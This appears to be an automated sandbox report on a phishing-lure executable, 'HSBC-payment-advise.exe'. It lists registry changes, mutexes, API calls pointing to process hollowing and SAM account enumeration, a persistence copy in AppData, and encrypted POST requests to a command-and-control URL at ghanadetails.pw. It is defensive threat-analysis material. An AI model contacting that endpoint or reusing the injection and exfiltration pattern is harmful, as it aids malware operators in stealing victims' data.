HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces

Delete Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyHwIdKey

Mutexes

Global\CLR_CASOFF_MUTEX
Global\F09C2E520D9F7BD4A80F1A35CA1AC659
Local\8ADC91C377DFC445A80F1A35CA1AC659
Local\BBB937E846BA626EA80F1A35CA1AC659
Global\6753F3C69A50A640554E0D5E375BD132
Global\6753F3C69A50A640594F0D5E3B5AD132
Global\6753F3C69A50A640094F0D5E6B5AD132
Global\6753F3C69A50A640D94F0D5EBB5AD132
Global\6753F3C69A50A640C14F0D5EA35AD132
Global\6753F3C69A50A640E14F0D5E835AD132
Global\6753F3C69A50A640B94F0D5EDB5AD132
Global\6753F3C69A50A640A14F0D5EC35AD132
Global\6753F3C69A50A640A94F0D5ECB5AD132
Global\6753F3C69A50A6403D4C0D5E5F59D132
Global\6753F3C69A50A640E14C0D5E8359D132
Global\6753F3C69A50A640414D0D5E2358D132
Global\6753F3C69A50A640114D0D5E7358D132
Global\6753F3C69A50A640354D0D5E5758D132
Global\6753F3C69A50A640F94D0D5E9B58D132
Global\6753F3C69A50A640394E0D5E5B5BD132
Global\6753F3C69A50A640694F0D5E0B5AD132
Global\6753F3C69A50A6407D4A0D5E1F5FD132
Global\6753F3C69A50A640314A0D5E535FD132
Global\6753F3C69A50A640254A0D5E475FD132
Global\6753F3C69A50A640E94A0D5E8B5FD132
Global\6753F3C69A50A640B14A0D5ED35FD132
Global\6753F3C69A50A64059490D5E3B5CD132
Global\6753F3C69A50A640CD490D5EAF5CD132
Global\6753F3C69A50A640954B0D5EF75ED132
Global\6753F3C69A50A6405D480D5E3F5DD132
Global\6753F3C69A50A6405D4A0D5E3F5FD132
Global\6753F3C69A50A640BD490D5EDF5CD132
Global\6753F3C69A50A6408D490D5EEF5CD132
Global\AABD9BAE57BECE28A80F1A35CA1AC659
Global\2EB9374AD3BA62CCA80F1A35CA1AC659
Global\9E6A77A263692224A80F1A35CA1AC659
Global\9F6A77A262692224A80F1A35CA1AC659
Local\4E8C34B1B38F6137A80F1A35CA1AC659
Local\CEAF2EB233AC7B34A80F1A35CA1AC659
Global\357433C7C8776641A80F1A35CA1AC659
Global\BC894FC8418A1A4EA80F1A35CA1AC659
Local\FA23BCCE0720E948A80F1A35CA1AC659
Local\7F9B9A398298CFBFA80F1A35CA1AC659
Local\89DC91C374DFC445A80F1A35CA1AC659
Global\1291883BEF92DDBDA80F1A35CA1AC659
Global\7906345D840561DBA80F1A35CA1AC659
Global\6753F3C69A50A640E9470D5E8B52D132
Global\BD894FC8408A1A4EA80F1A35CA1AC659
Global\6753F3C69A50A64065450D5E0750D132
Global\6753F3C69A50A640F54B0D5E975ED132
Global\6753F3C69A50A6408D470D5EEF52D132
Global\6753F3C69A50A640E5440D5E8751D132
Global\6753F3C69A50A640C1440D5EA351D132
Global\6753F3C69A50A6409D440D5EFF51D132
Global\6753F3C69A50A640A5490D5EC75CD132
Global\C::Users:Seven01:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex
Global\C::Users:Seven01:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer
Global\C::Users:Seven01:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer
Global\C::Users:Seven01:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer
Global\C::Users:Seven01:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1024.db!dfMaintainer
Global\C::Users:Seven01:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer
Global\C::Users:Seven01:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit
Global\C::Users:Seven01:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.VirtualAllocEx
ntdll.dll.NtGetContextThread
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
ntdll.dll.NtSetContextThread
kernel32.dll.Wow64SetThreadContext
ntdll.dll.NtProtectVirtualMemory
ntdll.dll.NtWriteVirtualMemory
ntdll.dll.NtReadVirtualMemory
ntdll.dll.NtTerminateProcess
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
kernel32.dll.CreateProcessW
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
ntdll.dll.NtCreateThread
ntdll.dll.NtCreateUserProcess
ntdll.dll.NtQueryInformationProcess
ntdll.dll.RtlUserThreadStart
ntdll.dll.LdrLoadDll
ntdll.dll.LdrGetDllHandle
ntdll.dll.ZwQueryInformationProcess
kernel32.dll.GetSystemWow64DirectoryW
urlmon.dll.ObtainUserAgentString
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
oleaut32.dll.#283
oleaut32.dll.#284
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
mmdevapi.dll.#3
wdmaud.drv.DriverProc
wdmaud.drv.modMessage
wdmaud.drv.midMessage
rpcrt4.dll.NdrClientCall3
wdmaud.drv.wodMessage
mmdevapi.dll.DllGetClassObject
ole32.dll.CoCreateFreeThreadedMarshaler
setupapi.dll.SetupDiCreateDeviceInfoList
kernel32.dll.RegOpenKeyExW
kernel32.dll.RegCloseKey
wdmaud.drv.mxdMessage
ole32.dll.CoTaskMemAlloc
shlwapi.dll.#487
ole32.dll.CoTaskMemFree
ole32.dll.PropVariantClear
setupapi.dll.SetupDiOpenDeviceInfoW
setupapi.dll.SetupDiGetDeviceInstanceIdW
setupapi.dll.SetupDiGetDevicePropertyW
shlwapi.dll.SHStrDupW
audioses.dll.DllGetClassObject
wdmaud.drv.widMessage
sechost.dll.QueryServiceConfigW
advapi32.dll.RegGetValueW
advapi32.dll.IsValidSid
advapi32.dll.GetLengthSid
advapi32.dll.CopySid
shell32.dll.SHGetFolderPathEx
ntdll.dll.RtlDllShutdownInProgress
ieproxy.dll.DllGetClassObject
ieproxy.dll.DllCanUnloadNow
comctl32.dll.DPA_Create
comctl32.dll.DPA_Search
comctl32.dll.DPA_InsertPtr
wscapi.dll.WscGetSecurityProviderHealth
comctl32.dll.DPA_DeletePtr
comctl32.dll.DPA_GetPtr
uxtheme.dll.GetThemeBackgroundRegion
oleaut32.dll.#500
kernel32.dll.RegDeleteKeyExW
slc.dll.SLGetWindowsInformationDWORD
sspicli.dll.GetUserNameExW
advapi32.dll.LookupAccountNameW
sechost.dll.ConvertSidToStringSidW
oleaut32.dll.#6
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
vssapi.dll.CreateWriter
oleaut32.dll.#2
samcli.dll.NetLocalGroupGetMembers
samlib.dll.SamConnect
rpcrt4.dll.RpcBindingFree
samlib.dll.SamOpenDomain
samlib.dll.SamLookupNamesInDomain
samlib.dll.SamOpenAlias
samlib.dll.SamFreeMemory
samlib.dll.SamCloseHandle
samlib.dll.SamGetMembersInAlias
netutils.dll.NetApiBufferFree
samlib.dll.SamEnumerateDomainsInSamServer
samlib.dll.SamLookupDomainInSamServer
ole32.dll.CoCreateGuid
ole32.dll.StringFromCLSID
oleaut32.dll.#4
oleaut32.dll.#7
propsys.dll.VariantToPropVariant
wbemcore.dll.Reinitialize
wbemsvc.dll.DllGetClassObject
wbemsvc.dll.DllCanUnloadNow
authz.dll.AuthzInitializeContextFromToken
authz.dll.AuthzInitializeObjectAccessAuditEvent2
authz.dll.AuthzAccessCheck
authz.dll.AuthzFreeAuditEvent
authz.dll.AuthzFreeContext
authz.dll.AuthzInitializeResourceManager
authz.dll.AuthzFreeResourceManager
rpcrt4.dll.RpcBindingCreateW
rpcrt4.dll.RpcBindingBind
rpcrt4.dll.I_RpcMapWin32Status
advapi32.dll.EventWrite
kernel32.dll.RegSetValueExW
kernel32.dll.RegQueryValueExW
wmisvc.dll.IsImproperShutdownDetected
wevtapi.dll.EvtRender
wevtapi.dll.EvtNext
wevtapi.dll.EvtClose
wevtapi.dll.EvtQuery
wevtapi.dll.EvtCreateRenderContext
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.RpcBindingSetOption
ole32.dll.CreateStreamOnHGlobal
advapi32.dll.RegCreateKeyExW
advapi32.dll.RegSetValueExW
cryptsp.dll.CryptGenRandom
kernelbase.dll.InitializeAcl
kernelbase.dll.AddAce
sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
kernel32.dll.IsThreadAFiber
kernel32.dll.OpenProcessToken
kernelbase.dll.GetTokenInformation
kernelbase.dll.DuplicateTokenEx
kernelbase.dll.AdjustTokenPrivileges
kernel32.dll.SetThreadToken
kernelbase.dll.AllocateAndInitializeSid
kernelbase.dll.CheckTokenMembership
oleaut32.dll.#285
advapi32.dll.RegOpenKeyW
oleaut32.dll.#12
oleaut32.dll.#286
ole32.dll.CLSIDFromString
oleaut32.dll.#17
oleaut32.dll.#20
oleaut32.dll.#19
oleaut32.dll.#25
ole32.dll.CoRevertToSelf
advapi32.dll.LogonUserExExW
sspicli.dll.LogonUserExExW
authz.dll.AuthzInitializeContextFromSid
ole32.dll.CoGetCallContext
ole32.dll.CoImpersonateClient
advapi32.dll.OpenThreadToken
oleaut32.dll.#8
oleaut32.dll.#9
ole32.dll.CoSwitchCallContext
oleaut32.dll.#287
oleaut32.dll.#288
oleaut32.dll.#289
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
ntmarta.dll.GetMartaExtensionInterface
fastprox.dll.DllGetClassObject
fastprox.dll.DllCanUnloadNow
oleaut32.dll.#290
devobj.dll.DevObjCreateDeviceInfoList
devobj.dll.DevObjGetClassDevs
devobj.dll.DevObjEnumDeviceInterfaces
devobj.dll.DevObjGetDeviceInterfaceDetail
cfgmgr32.dll.CM_Connect_MachineA
cfgmgr32.dll.CM_Disconnect_Machine
cfgmgr32.dll.CM_Locate_DevNodeW
cfgmgr32.dll.CM_Get_DevNode_Registry_PropertyW
cfgmgr32.dll.CM_Get_Child
cfgmgr32.dll.CM_Get_Sibling
cfgmgr32.dll.CM_Get_DevNode_Status
cfgmgr32.dll.CM_Get_First_Log_Conf
cfgmgr32.dll.CM_Get_Next_Res_Des
cfgmgr32.dll.CM_Get_Res_Des_Data
cfgmgr32.dll.CM_Get_Res_Des_Data_Size
cfgmgr32.dll.CM_Free_Log_Conf_Handle
cfgmgr32.dll.CM_Free_Res_Des_Handle
cfgmgr32.dll.CM_Get_Device_IDA
cfgmgr32.dll.CM_Get_Device_ID_Size
cfgmgr32.dll.CM_Get_Parent
oleaut32.dll.#15
oleaut32.dll.#26
oleaut32.dll.#40
devobj.dll.DevObjDestroyDeviceInfoList

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\HSBC-payment-advise.exe "
"C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.exe"
"C:\Windows\system32\cmd.exe" /c "C:\Users\Seven01\AppData\Local\Temp\tmpb62df5cb.bat"
"C:\Users\Seven01\AppData\Roaming\Fibaasopixuz\bihyvetet.exe "
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2017-07-13 21:51:04 2017-07-13 21:53:58 174

179 HTTP Request(s) detected

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

Q3\xd4W\xf7MXP!\xd4\xaa	\x83\xa2	"\xcbB(\xa9\xa5ydL\x89\xc7N<K\xc8r\x04i\xe9u\xc1h\xae\x1c_\xbc\x8d\x18\x94.\x94h\x97\xb1s&1\xb2\x19\xd4\x81.\xcc_\x17\x9b\xcb\xa7\x8f \x99\xbf\x98\xf4\x88\xcd\x13&\xdf\xd4^\x8c\xd1Nf\x907^\x13\x8fM\x03\xd4<n~r\xe7j\xd4\xad\xe4u\xe55\xc8o\xc7/f,\x98\xf4>W>\x18\x81\x8c\xfd\xad\xf2T\xedU\x07\xde\xa3\x88\x02\xa9\xc0J\x08\x91

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xcdSAM\xe9r\xd7\x18\x80@\x023X\xc9Z\xd6\xf9zp\xdcO\xc2~=\xd1\x1dL\xe0?\xed\x19[\xa6\xda\xb3\x88%\xc2\xc0DNJ\xe3\xfd\xceBU[\xee\x80\x8d\xcc\x8f\x17*P\x8b\xd8\xc9\x1a>?\x1d\x012w\xa4\x0cd9\xcc\xd5	\xc5\xf2\xea\xd94\x93\x1c,\x81\x88\xe8\xebx\x97+\xea:\xf2 \x1d\xc11|\xa9\xc4\xa1\xfe\x07\x81\x99\xb6\x16i\xe1\x1f4\xed\xbc=bet	\xdd*2\xe1\x8e\xd5p\x85\xb3N*\x83C\x1519*\xe2\x84\xd2\xf9b\x13\xa8\xf4\x1c

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

l\xf1C*\xf0\xe1\xaf4:\xa6\xcd\x93\xac\x7f\xc4\x059\x90\x12\xd1\x1e\xe9\xec\xdf\xe00\xf6+\x1a\xc1\x86=a\x1e\xd7\x89Z7\xde\x0e\x92\xcaJ;\\x92\xad\xeeH\x0c\x89\xa7\xb8Z\xde\xd4\xdc\x93\x15\xb7}u\xe4\x01\x93\xd5\xa6k}\xaa\xb4\xf9\xb3#=J-\x82
\xcf\xeck\xea\xe5\xbaS\x05\xc9\xdb\x17H\xeb8\xed\xae\x1an\x00\xc5\xffxt\x87\xfc\xca\xe9H\xd9\xa6=D\x88\xc4\xe9pb\xeag\xc6e\xd9\x9e\xac(\xf0\x04\xd3\x83\xe2\xb73^3q\xfc\xfeC\x84\xdc\x08\x00\xaa

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

XT\x05\xe7\x15\x9f\xdc\xda\xc5\xccHK\x08\xca\xe1\xac\x1f\xb1\xd4\xdc}Q\xb0\x9dz[\xd4\xf81\xa6\xbd\xdb\xbfQ{\xaeU\xa3G
\x87J%	z#_\xc6\xba_\x05\x9b\xb5\xee\xdf\x8f\x02\x8f\x1a\x0c>z\xb7\x8f)\xfen(\x16ZI\x99\xc2\xc76\x1c\x07\xb9\xa6\xe8D\xc4\xa2fWe\xd7\x05\xcf\xf2\xe4\xb6\x9d\x04\x1br2\xcd\xebZ\xf5b\x9cz]\xeb\xa5ij\xe0	I\x8a\xa0\xde\x07\xf5\xa3\xe6[+\x9d\xe6\x93\xa7\x18\xd0J\x01\xf6

http://ghanadetails.pw/1/file.php
